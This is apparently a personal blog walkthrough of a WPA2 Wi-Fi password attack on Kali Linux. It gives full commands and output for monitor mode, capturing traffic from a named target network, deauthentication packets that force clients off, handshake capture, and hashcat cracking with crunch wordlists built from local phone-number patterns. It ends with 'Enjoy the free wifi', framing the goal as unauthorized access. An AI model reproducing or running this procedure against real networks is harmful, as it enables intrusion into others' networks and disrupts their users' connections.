Preparation

  • Kali Linux operating system
  • A Wifi dongle that supports monitor mode and packet injection, I’m using TP-LINK AX1800 Archer TX35U, do have to install a driver on github (update: the dongle was not working lol, now using Alfa AWUS036ACM works out of the box without any driver)

Attack

Can use root terminal for convenience (be careful tho)

1. Check interface name using iwconfig

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(squarejellyfish@kali)-[~]
└─$ iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:"WIFINAME"  
          Mode:Managed  Frequency:5.745 GHz  Access Point: 76:90:BC:5E:0D:F0   
          Bit Rate=864.8 Mb/s   Tx-Power=12 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality=58/70  Signal level=-52 dBm  
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Usually looks something like wlanX

2. Start monitor mode using airmon-ng start <interface-name>

1
2
airmon-ng check kill # kills processes that would interfere
airmon-ng start wlan0

In some case the interface would be rename to wlanXmon, in my case it doesn’t do that.

The internet will be un-usable until you do airmon-ng stop wlan0 and also restarting the NetworkManager and shit (depends on what airmon-ng killed)

3. Monitor nearby wifi traffic

1
airodump-ng wlan0

Output (other wifi is ):

1
2
3
4
5
6
7
8
9
CH 10 ][ Elapsed: 6 s ][ 2025-10-20 20:56                                                                          
                                                                                                                   
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                    
                                                                                                                   
XX:XX:XX:XX:XX:XX
74:90:BC:2E:0D:F0  -41        4        0    0   6  648   WPA2 CCMP   PSK  999                                      
XX:XX:XX:XX:XX:XX
XX:XX:XX:XX:XX:XX
XX:XX:XX:XX:XX:XX

999 is our target wifi, remember the BSSID and CH (channel) now run airodump-ng again but only monitor the target, -w to specify the output file name (later would be used):

1
airodump-ng -d 74:90:BC:2E:0D:F0 -c 6 -w 999 wlan0

airodump-ng will now only capture the traffic of the target wifi.

4. De-auth attack to capture 4 way WPA handshake

We want to capture the traffic of a client connecting to the target wifi, you can wait until someone is connected to the wifi, or use aireplay-ng to inject de-auth packet to kick someone off the network, the device will usually auto reconnect.

In another terminal, run aireplay-ng -0 10 and specify the BSSID of the target wifi with -a, and target you want to de-auth using -c. You can also de-auth all the client without specifying -c.

-0 means send de-auth packet, 10 means 10 packets, do -0 0 to auto send without stopping.

1
aireplay-ng -0 10 -a 74:90:BC:2E:0D:F0 -c <device-to-kick> wlan0

A couple of de-auth later, in airodump-ng terminal, you may see WPA handshake text pop up.

1
2
3
4
5
6
7
8
9
10
11
CH  6 ][ Elapsed: 6 mins ][ 2025-10-20 21:10 ][ WPA handshake: 74:90:BC:2E:0D:F0                                   
                                                                                                                   
BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                
                                                                                                                   
74:90:BC:2E:0D:F0  -36   0     3445    28225    4   6  648   WPA2 CCMP   PSK  999                                  
                                                                                                                   
BSSID              STATION            PWR    Rate    Lost   Frames  Notes  Probes                                  
                                                                                                                   
74:90:BC:2E:0D:F0  7C:4B:26:C5:54:86    0    6e-24   2764    29142  EAPOL                                           
74:90:BC:2E:0D:F0  98:41:5C:B1:DF:C1    0    1e-24e     0       37                                                 
74:90:BC:2E:0D:F0  E4:AA:EC:B4:CB:58    0    6e-24e     0      377

You can close the terminal now, and couple of files will pop up in the current directory. XXX.cap is the file we’re interested in.

5. Cracking the password

Traditionally, we would use aircrack-ng to bruteforce the password, but if you have a GPU, hashcat would be much much better.

  1. Convert the .cap file to .hc22000 format
1
2
3
# install the hcx toolset
sudo apt install hcxtools
hcxpcapngtool -o 999.hc22000 999.cap
  1. Prepare wordlist (optional)

Use crunch to precompute a password list. In my case (in Taiwan), wifi password often is the house phone number, so I crunch one wordlist with 8-digit, and another that starts with 02

1
2
3
crunch 8 8 -t %%%%%%%% -o 8-digit.txt
crunch 10 10 -t 02%%%%%%%% -o taipei-02-10-digits.txt
cat 8-digit.txt taipei-02-10-digits.txt > wordlist.txt

crunch 8 8 means 8 to 8 characters, -t %%%%%%%% means the format is 8 digit

  1. Crack

Use hashcat, specify the crack format to hc22000 by -m 22000

1
hashcat -m 22000 999.hc22000 wordlist.txt
  1. Enjoy the free wifi